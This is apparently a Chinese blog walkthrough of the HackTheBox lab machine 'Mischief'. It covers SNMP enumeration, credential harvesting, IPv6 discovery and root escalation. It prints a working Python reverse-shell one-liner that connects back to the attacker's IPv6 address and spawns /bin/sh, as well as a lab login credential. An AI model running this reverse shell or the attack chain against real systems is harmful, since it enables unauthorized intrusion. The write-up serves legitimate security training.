**
HackTheBox-Linux-Mischief-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/145
靶机难度:疯狂(5.0/10)
靶机发布日期:2019年1月3日
靶机描述:
Mischief is hard to insane difficulty machine that highlights the risks involved with exposing SNMP, and the dangers of passing credentials over the command line. It also features a “ping” admin page - functionality often found on appliances, which is worth testing for RCE vulnerabilities.
作者:大余
时间:2020-06-11
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.92…
Nmap发现开放了SSH(需要基本身份验证的Python Web服务器)和SNMP…
可以看到本地开放了3366和UDP有关…
看到登录凭据被用作连接端口3366进行身份验证…获得登录账号密码…
直接访问3366页面,利用凭证成功登录…又获得了两组密码…
对于snmp以前HTB靶机也遇到过,存在snmp一般在ipv6上也开放了相对应的端口…
命令:git clone https://github.com/trickster0/Enyx.git
利用Enyx脚本获取靶机的ipv6信息…
通过nmap扫描发现了ssh和80端口都开放着…
通过IPv6成功访问页面…
这是个登陆页面…从前面获取的两组密码…进行尝试…
通过administrator/trickeryanddeceit成功进入…
可以看到这是命令执行的面板REC,可以运行任意系统命令…利用python简单shell提权…
可以看到,这里使用 IP无法提权…
命令:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1031",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
需要IPV6进行,获得了反向外壳…
无法获得user_flag信息…但是在loki目录下读取到了passwd密码信息…
尝试ssh登陆,成功登陆…获得了user_flag信息…
直接枚举目录底层信息…查看第一个文件就发现了loki又一组密码信息…
可以看到loki用户没有执行切换用户命令的权限…
回到前面的www权限,优化TTY后,su获得了root权限…但是还是无法读取root_flag…
提示root_flag不在此处…说明root没加密流,继续在别的地方找找…
获得了root_flag信息…
这台靶机说难,其实感觉很中规中矩…作者给了Insane难度评价…疯狂…
可能大多数人会在TCP坑里停留很久…
针对HTB的5.0难度靶机,推荐UDP也顺带nmap…
我前面做了两台类似的snmp_udp的靶机…然后利用ipv6提权的…所以可能比较轻松…
获得www提权后,如果加点加密流阻碍,在弄个缓冲区溢出提权…才能对得起Insane难度评价把…
给个评价难度高级…哈哈哈…加油
由于我们已经成功得到root权限查看user和root.txt,因此完成这台高级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
